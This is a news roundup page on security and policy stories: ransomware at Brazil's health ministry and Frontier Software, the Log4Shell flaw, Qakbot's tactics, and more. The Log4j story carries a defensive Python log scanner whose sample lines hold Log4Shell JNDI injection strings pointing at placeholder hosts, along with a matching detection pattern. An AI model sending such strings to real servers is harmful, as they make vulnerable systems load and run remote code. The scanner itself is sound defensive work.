More stories

UK High Court reverses course, approves Julian Assange's extradition to US

A UK High Court has approved the extradition of WikiLeaks founder Julian Assange to the US.

Assange has been wanted by US authorities since the early 2010s for his role in acquiring and disseminating military and diplomatic documents via the WikiLeaks website. Following a long stint at Ecuador’s embassy in London, he was finally arrested in 2019, when his asylum was revoked. He has been indicted on 18 criminal counts, including 17 espionage charges. The collective maximum sentence for all charges comes to 175 years, but the US government has indicated that the actual term of imprisonment would be far, far shorter.

This decision follows an earlier ruling made in January 2021, which denied the US request on the basis of the court’s view that extradition posed too great a risk to Assange’s wellbeing. The judge forbade the extradition due to “a recurrent depressive disorder which was severe in December 2019 and sometimes accompanied by psychotic features (hallucinations), often with ruminative suicidal ideas.” The new ruling takes concerns over Assange’s mental health into account, but it also relies on a series of four “assurances” made by US officials. These include: a promise that Assange will never be held under any “special administrative measures”; a commitment never to house him in a maximum-security prison; a guarantee that he will be allowed to serve his final sentence in his native Australia, if he wishes; and a commitment to provide him with “appropriate clinical and psychological treatment as recommended by a qualified treating clinician at the prison where he is held.”

Assange’s fiancée, Stella Morris, was outraged by the decision, telling the UK’s Sky News that his legal counsel intended to appeal “at the earliest possible moment.” She called the ruling a “grave miscarriage of justice,” asking how the UK could allow him to be sent to a country that “plotted to kill him.” This final accusation likely relates to reporting from earlier this year claiming that the Trump administration explored the possibility of forcibly kidnapping or assassinating Assange in 2017. The US government has never officially commented on this report.

Assange remains a controversial figure, with organizations like Amnesty International and individuals like Edward Snowden still calling for his release based on concerns over preserving freedom of speech and the arrest’s chilling effect on investigative journalism. The US government, however, has never wavered in its stance that the WikiLeaks founder’s actions were criminal in nature, putting lives at risk by divulging classified information to enemies of the US.

Assange’s legal team now has 14 days to file their appeal, which will delay any extradition proceedings until that filing is resolved.

German logistics giant Hellmann reports cyberattack

Billion-dollar logistics firm Hellmann Worldwide Logistics reported a cyberattack this week that forced it to temporarily remove all connections to its central data center. The company said the shutdown was having a “material impact” on its business operations.

The German company operates in 173 countries, running logistics for a range of air and sea freight as well as rail and road transportation services. Air Cargo News, which first reported the attack, said the company had revenue of nearly $3 billion last year.

In a statement, Hellmann said its Global Crisis Taskforce discovered the attack but that outside cybersecurity experts were brought in to help with the response. “Operations will be restored step by step, with the security and integrity of the systems as the top priority,” reads the statement. The statement does not say whether the company suffered a ransomware attack, and the company did not respond to requests for comment.

This is a particularly inopportune time for a global logistics firm like Hellmann to suffer a cyberattack, considering the role it plays in the global supply chain, explained Nasser Fattah, North America steering committee chair at Shared Assessments. “Today, the movement of goods is a global process that requires a concerted effort because the supply chain may include transportation, shipping, receiving, storage, and management of goods,” Fattah said.

“The slightest kink in the chain can cause the business to suffer simply because of untimely deliveries. And businesses know that implementing seamless logistics is essential to keep pace with customer demands and remain competitive.”

Brazilian Ministry of Health suffers cyberattack and COVID-19 vaccination data vanishes

Websites under Brazil’s Ministry of Health (MoH) have suffered a major ransomware attack that left the COVID-19 vaccination data of millions of citizens unavailable. Following the attack, which took place at around 1 am today, all of the MoH’s websites became unavailable, including ConecteSUS, which tracks citizens’ trajectory through the public healthcare system. This includes the COVID-19 digital vaccination certificate, which is available via the ConecteSUS app.

According to a message left by the Lapsus$ Group, which has claimed responsibility for the attack, some 50 TB worth of data was extracted from the MoH’s systems and subsequently deleted. “Contact us if you want the data returned”, the message said, alongside contact details for the authors of the attack. Just before 7 am, the images with the message left by the hackers were removed, but the websites remained unavailable.

Image: The message left by the hackers claiming the Ministry of Health attack

Contacted by ZDNet about the measures in place to mitigate the attack and reestablish the systems, and about whether there are backups of the data allegedly stolen from its systems, the Ministry of Health had not returned requests for comment at the time of writing.

The incident follows a previous attack on the Brazilian Health Regulatory Agency (Anvisa) in September. That attack targeted the healthcare declaration for travelers, compulsory for individuals entering Brazil via airports. It took place soon after the cancellation of the World Cup qualifier match between Brazil and Argentina, in which Anvisa interrupted the game after four Argentinian players were accused of breaking COVID-19 travel protocols.

Similarly, the latest issue faced by the Ministry of Health occurs amid increasing pressure on the Brazilian government to demand COVID-19 vaccination certificates from international travelers coming to Brazil, in response to the rise of the omicron variant.

This is not the first major security issue faced by Brazil’s Ministry of Health over the last few months. In November 2020, personal and health information of more than 16 million Brazilian COVID-19 patients was leaked online after a hospital employee uploaded a spreadsheet with usernames, passwords, and access keys to sensitive government systems to GitHub. Less than a week later, another major security incident emerged: the personal information of more than 243 million Brazilians, both living and deceased, was exposed online after web developers left the password for a crucial government database inside the source code of an official MoH website for at least six months.

Security warning: New zero-day in the Log4j Java library is already being exploited

A newly discovered zero-day vulnerability in the widely used Java logging library Apache Log4j is easy to exploit and enables attackers to gain full control of affected servers. Tracked as CVE-2021-44228, the vulnerability is classed as severe and allows unauthenticated remote code execution with the privileges of the user running the application that uses the logging library. CERT New Zealand warns that it’s already being exploited in the wild. CISA has urged users and administrators to apply the recommended mitigations “immediately” in order to address the critical vulnerability.

Systems and services that use the Apache Log4j Java logging library between versions 2.0 and 2.14.1 are all affected, including many services and applications written in Java. The vulnerability was first discovered in Minecraft, but researchers warn that cloud applications are also vulnerable. Log4j is also used in enterprise applications, and it’s likely that many products will be found to be vulnerable as more is learned about the flaw. A blog post by researchers at LunaSec warns that anybody using Apache Struts is “likely vulnerable.”

LunaSec said: “Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We’re calling it “Log4Shell” for short.”

Organisations can identify whether they’re affected by examining the log files of any services using affected Log4j versions. If those logs contain user-controlled strings (CERT-NZ uses the example of “Jndi:ldap”), the services could be affected. To mitigate the vulnerability, users should set log4j2.formatMsgNoLookups to true by adding “-Dlog4j2.formatMsgNoLookups=True” to the JVM command used to start the application. To prevent the library from being exploited, it’s urgently recommended that Log4j is upgraded to log4j-2.15.0-rc1.

“If you believe you may be impacted by CVE-2021-44228, Randori encourages all organizations to adopt an assumed breach mentality and review logs for impacted applications for unusual activity,” cybersecurity researchers at Randori wrote in a blog post. “If anomalies are found, we encourage you to assume this is an active incident, that you have been compromised and respond accordingly.”
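As an added example (not from the article, CERT NZ or any of the vendors quoted), the following Python triage script applies the two checks described above: it scans constructed sample log lines for JNDI lookup strings, matching case-insensitively since the quoted indicator is “Jndi:ldap”, and classifies a service from its Log4j version and JVM start command. It assumes the affected range of 2.0 to 2.14.1 given above and adds one fact the article does not state: the formatMsgNoLookups property only exists in Log4j 2.10.0 and later, so older releases need the upgrade rather than the flag.

```python
import re
from typing import List, NamedTuple, Tuple

# Case-insensitive match for a Log4j lookup naming the JNDI resolver, e.g.
# "${jndi:ldap://...}". CERT NZ's indicator is "jndi:ldap"; matching any
# scheme after "jndi:" also covers the other JNDI providers Log4j can reach.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi:(?P<scheme>[a-z]+)", re.IGNORECASE)

# Affected range as stated in the article: Log4j 2.0 through 2.14.1.
AFFECTED_MIN: Tuple[int, int, int] = (2, 0, 0)
AFFECTED_MAX: Tuple[int, int, int] = (2, 14, 1)
# formatMsgNoLookups only exists from 2.10.0 (known fact, not in the article).
FLAG_MIN: Tuple[int, int, int] = (2, 10, 0)

# Constructed sample access-log lines; the host name is a placeholder.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://lookup.example.invalid/a}"',
    '10.0.0.7 - - "GET /login HTTP/1.1" 302 "${JNDI:RMI://lookup.example.invalid/x}"',
    '10.0.0.5 - - "GET /health HTTP/1.1" 200 "curl/7.79.1"',
]


class Hit(NamedTuple):
    line_no: int
    scheme: str
    text: str


def parse_version(version: str) -> Tuple[int, int, int]:
    """'2.14.1' -> (2, 14, 1); '2.0' -> (2, 0, 0); a '-rc1' suffix is ignored."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        raise ValueError(f"unrecognised Log4j version: {version!r}")
    major, minor, patch = m.groups(default="0")
    return int(major), int(minor), int(patch)


def is_affected(version: str) -> bool:
    """True when the Log4j version falls in the range the article lists."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def scan_logs(lines: List[str]) -> List[Hit]:
    """Return every line carrying a JNDI lookup string, with its scheme."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        m = JNDI_LOOKUP.search(line)
        if m:
            hits.append(Hit(line_no, m.group("scheme").lower(), line.strip()))
    return hits


def mitigation_status(version: str, jvm_cmdline: str) -> str:
    """Classify one service from its Log4j version and JVM start command."""
    if not is_affected(version):
        return "not-affected"
    flag = re.search(r"-Dlog4j2\.formatMsgNoLookups=(\w+)", jvm_cmdline)
    flag_on = bool(flag) and flag.group(1).lower() == "true"
    if flag_on and parse_version(version) >= FLAG_MIN:
        return "mitigated-by-flag"  # upgrading to 2.15.0 remains the real fix
    return "vulnerable"


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(f"line {hit.line_no}: jndi:{hit.scheme} lookup -> {hit.text}")
    cmd = "java -Dlog4j2.formatMsgNoLookups=True -jar app.jar"
    print("2.14.1 with flag:", mitigation_status("2.14.1", cmd))
    print("2.9.1 with flag: ", mitigation_status("2.9.1", cmd))
```

Any hit from scan_logs is a reason to treat the host as an active incident, as Randori advises, rather than proof of compromise on its own.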

This old malware has just picked up some nasty new tricks

Qakbot, a top trojan for stealing bank credentials, has in the past year started delivering ransomware, and this new business model is making it harder for network defenders to detect what is and isn’t a Qakbot attack. Qakbot is an especially versatile piece of malware that has been around for over a decade and has survived despite multi-year efforts by Microsoft and other security firms to stamp it out. In 2017 Qakbot adopted WannaCry’s lateral movement techniques, such as infecting all network shares and drives, brute forcing Active Directory accounts, and using the SMB file-sharing protocol to create copies of itself.

Kaspersky’s recent analysis of Qakbot concluded that it won’t disappear anytime soon. Its detection statistics for Qakbot indicated it had infected 65% more PCs between January and July 2021 compared to the same period in the previous year. So, it is a growing threat.

Microsoft highlights that Qakbot is modular, allowing it to appear as separate attacks on each device on a network, making it difficult for defenders and security tools to detect, prevent and remove. It’s also difficult for defenders to detect because Qakbot is used to distribute multiple variants of ransomware. “Due to Qakbot’s high likelihood of transitioning to human-operated attack behaviors including data exfiltration, lateral movement, and ransomware by multiple actors, the detections seen after infection can vary widely,” the Microsoft 365 Defender Threat Intelligence Team says in its report. Given these difficulties pinpointing a common Qakbot campaign, the Microsoft team has profiled the malware’s techniques and behaviors to help security analysts root out this versatile malware.

The primary delivery mechanism is emailed attachments, links, or embedded images. However, it’s also known to use Visual Basic for Applications (VBA) macros as well as legacy Excel 4.0 macros to infect machines. Trend Micro analyzed a large Qakbot campaign in July that used this technique. Other groups like Trickbot recently started using Excel 4.0 macros to call Win32 APIs and run shell commands. As a result, Microsoft disabled these macro types by default, but Qakbot uses text in an Excel document to trick targets into manually enabling the macro.

Qakbot employs process injection to hide malicious processes, creates scheduled tasks to persist on a machine, and manipulates the Windows registry. Once running on an infected device, it uses multiple techniques for lateral movement, employs the Cobalt Strike penetration-testing framework, or deploys ransomware. The FBI last year warned that Qakbot trojans were delivering ProLock, a “human-operated ransomware” variant. It was a worrying development: computers infected with Qakbot on a network must be isolated because they are a bridge for a ransomware attack. Microsoft notes that MSRA.exe and Mobsync.exe have been used by Qakbot for this process injection in order to run several network ‘discovery’ commands and then steal Windows credentials and browser data.

Qakbot’s Cobalt Strike module lends itself to other criminal gangs, who can drop their own payloads, such as ransomware. Per Trend Micro, Qakbot has delivered MegaCortex and PwndLocker (2019), Egregor and ProLock (2020), and Sodinokibi/REvil (2021). “Qakbot has a Cobalt Strike module, and actors who purchase access to machines with prior Qakbot infections may also drop their own Cobalt Strike beacons and additional payloads,” Microsoft notes. “Using Cobalt Strike lets attackers have full hands-on-keyboard access to the affected devices, enabling them to perform additional discovery, find high-value targets on the network, move laterally, and drop additional payloads, especially human-operated ransomware variants such as Conti and Egregor.”

Microsoft’s recommended mitigations to minimize Qakbot’s impact include enabling Office 365 phishing protection, enabling SmartScreen and network protection in the Edge browser, and ensuring runtime macro scanning by turning the Windows Antimalware Scan Interface (AMSI) on. AMSI is supported by Microsoft Defender antivirus and several third-party antivirus vendors. AMSI support for Excel 4.0 macros arrived in March, so it’s still a relatively new feature.

Singapore-UK digital economy pact to focus on cybersecurity, trade

Singapore and the UK have wrapped up negotiations on a digital economy agreement that focuses on digital trade, data flows, and cybersecurity. Under the pact, both nations will look to establish, amongst other things, interoperable systems for digital payments, secured data flows, and digital identities, as well as collaborate on cybersecurity. When formally inked, the digital economy agreement would be Singapore’s third, following two others it signed with Chile and New Zealand as well as Australia. The UK agreement included “binding disciplines” of the digital economy such as data, and cooperation in emerging areas including artificial intelligence, fintech, digital identities, and legal technology.

Common digital systems, for instance, would be put in place to facilitate e-payments, e-invoicing, and other electronic documents such as bills of lading. The goal here was to drive faster and cheaper transactions, reducing costs for businesses in both markets. The two countries also would look to enable trusted data flows and data protection for various functions, including financial services. In addition, a “trusted and secure digital environment” would be critical to drive and safeguard participation for both businesses and consumers. For example, private cryptography keys and embedded algorithms would help secure an organisation’s source code, while consumers should be protected against fraudulent and deceptive online behaviour.

For a start, government agencies from both sides last week signed three Memoranda of Understanding (MOUs) in digital trade, digital identities, and cybersecurity. Collectively, these aimed to facilitate cross-border services between Singapore and the UK, whose bilateral services trade was tipped at SG$22 billion ($16.02 billion) in 2019.

Some 70% of the UK’s cross-border services exports to Singapore in 2019 also were digitally processed, totalling £3.2 billion ($4.23 billion). The UK is Singapore’s largest services trading partner in Europe and the Asian economy’s second-largest European investor and European investment destination, with more than SG$100 billion ($72.81 billion) of UK investment stock in Singapore.

Under the digital trade MOU, a scheme would be piloted to simulate the transfer of electronic bills of lading, with the aim of easing cross-border trade transactions. Digitalising this process helped cut cost and transaction time as well as reduce fraud. The MOU on digital identities looked to develop mutual recognition and interoperability between both countries’ digital identity regimes. The goal here was to establish more reliable identity verification and process applications more quickly. In cybersecurity, the two nations hoped to build on a shared goal of “addressing international challenges” and promoting bilateral collaboration to bolster cybersecurity, including in Internet of Things (IoT), capacity building, and cyber resilience.

Singapore’s Minister-in-charge of Trade Relations S. Iswaran said: “Singapore’s digital economy agreements build on and enhance the economic connectivity established through our extensive network of free trade agreements. Reflecting our shared ambition, the UK-Singapore Digital Economy Agreement builds upon and, in some areas, goes further than our existing agreements. It will set a global benchmark for high-standard digital trade rules and benefit people and businesses in our two countries.”

Negotiations for the Singapore-UK digital trade agreement kicked off in June 2021.

Social media platforms being regulated as telcos under discussion in Australia

A parliamentary joint committee is currently considering whether social media platforms should be regulated as carriage service providers, given the amount of communications and content sent through them. Various experts have submitted to the committee that social media platforms like Facebook are of such a significant scale, and so uniquely pertinent to the problem of online child exploitation, that they should be subject to additional scrutiny, such as being regulated as carriage service providers. The considerations are part of the Parliamentary Joint Committee on Law Enforcement’s inquiry into Australia’s law enforcement capabilities in relation to child exploitation.

During a joint parliamentary hearing on Friday, Meta told the committee that it believes Australia’s framework for law enforcement working with social media platforms to detect child abuse material is already sufficient, and that the additional classification could be redundant. “We’ve set up a dedicated portal, we have a dedicated team to liaise with law enforcement, and then we can disclose what we call basic subscriber information data quite quickly through that process. We obviously have emergency channels if there’s any threat to life; either we proactively disclose or law enforcement can ask us for assistance through those emergency processes,” said Mia Garlick, Meta Australia New Zealand Pacific Islands public policy director. “So I guess from where [Meta] sits in terms of our engagement with law enforcement, we feel that there is already sort of a good way to get there and so it might not be necessary to sort of tinker with definitions in the Telecommunications Act when we’ve got the ability to work constructively through the existing frameworks.”

While the eSafety commissioner said last month that social media platforms have primarily done a good job of removing abhorrent violent material, it noted in its submission to the committee that the approach to detecting and removing child abuse material is different, partly because this type of content is primarily distributed through private communication channels.

The government agency also said that as more social media platforms move towards encrypted communications, this dynamic could effectively create “digital hiding places”. It shared its worry that platforms may also claim they are absolved of responsibility for safety because they cannot act on what they cannot see. eSafety online content manager Alex Ash told the committee yesterday afternoon that a drift towards encrypted communications by major social media platforms would make investigations into serious online child sexual abuse and exploitation more difficult. He did note, however, that in instances where eSafety was able to detect such material on social media platforms, the platforms have been cooperative and quick to respond to the flagged material.

To address these concerns regarding the growing shift toward encrypted communications, the committee on Friday sought consultation on the merits of communications to and from minors aged 13-18 being exempt from encryption from a technical standpoint, as well as whether such a framework was technically possible. Meta’s safety head Antigone Davis said that while it may be possible to create a partial encryption system, she believes it would come at the cost of undermining encryption for other individuals engaging on the platform. As a counterpoint, Davis said her company believes it would be possible to build protections into an encrypted service through mechanisms such as enabling the blurring of images, preventing people from being able to contact minors, making it easier for users to report child abuse material, and using non-encrypted information to catch people who proliferate child abuse material. “While they may obfuscate some of what they’re doing, what we do find is that they do leave trails, they do leave what you might think of as prompts. So for example, you may see people have this kind of interest, provoked sexualised comments under minors, or you may see what will look like an innocuous bringing together of lots of photos of minors that appear innocuous … so there are opportunities to actually use those breadcrumbs,” Davis said.

Communications Alliance program management director Christiane Gillespie-Jones, who also appeared before the committee, provided a slightly different picture of how encrypted communications could affect law enforcement’s ability to detect child abuse material. While Gillespie-Jones agreed with Meta’s sentiment that encrypted communications were important for user privacy, after being questioned about their impact on detecting child abuse material she acknowledged the possibility that encrypted communications could make certain child abuse material no longer discoverable. As to how much more difficult encrypted communications would make detecting such material, Gillespie-Jones said this was currently unquantifiable.

South Australian government employee data taken in Frontier Software ransomware attack

South Australia Treasurer Rob Lucas said on Friday that state government employee data has been exfiltrated as part of a ransomware attack on payroll provider Frontier Software. Lucas said the company has informed the government that some of the data has been published online, with at least 38,000 and up to 80,000 government employees possibly having had their data accessed. The data contained names, dates of birth, tax file numbers, home addresses, bank account details, employment start dates, payroll periods, remuneration, and other payroll-related information. “We can confirm that no Department for Education employees are affected,” Lucas said in a statement. “The government’s priority is the safety and security of every employee affected by this incident, and we are doing all we can to provide assistance to impacted employees.” Frontier Software has been handling payroll for South Australia since 2001. On its site, the government states it “undertakes regular independent security tests and reviews” of Frontier Software.

Frontier Software was attacked last month, on November 13, and alerted its customers to what it labelled a “cyber incident” on November 16. It said its systems were restored on November 17. “To date, our investigations show no evidence of any customer data being exfiltrated or stolen. Whilst the incident resulted in some of Frontier Software’s Australian corporate systems being encrypted, Australian customer HR & Payroll data and systems are segmented from the corporate systems and were not compromised,” it said on November 17.

On Thursday, the company sang a different tune. “The ongoing forensic investigation and other response activities conducted by Frontier Software and CyberCX has now confirmed evidence of some data exfiltration from Frontier Software’s internal Australian corporate environment,” it said. “We have not identified evidence of compromise or exfiltration outside this segmented environment. We have further identified that some of the data exfiltrated from our internal corporate environment relates to a small number of Frontier Software customers. We are now in the process of directly notifying these customers that they may be affected.”

During November, the ABC reported that Federal Group, the owner of Hobart’s Wrest Point casino, had to make advance payments of AU$250 to staff due to the attack on Frontier Software.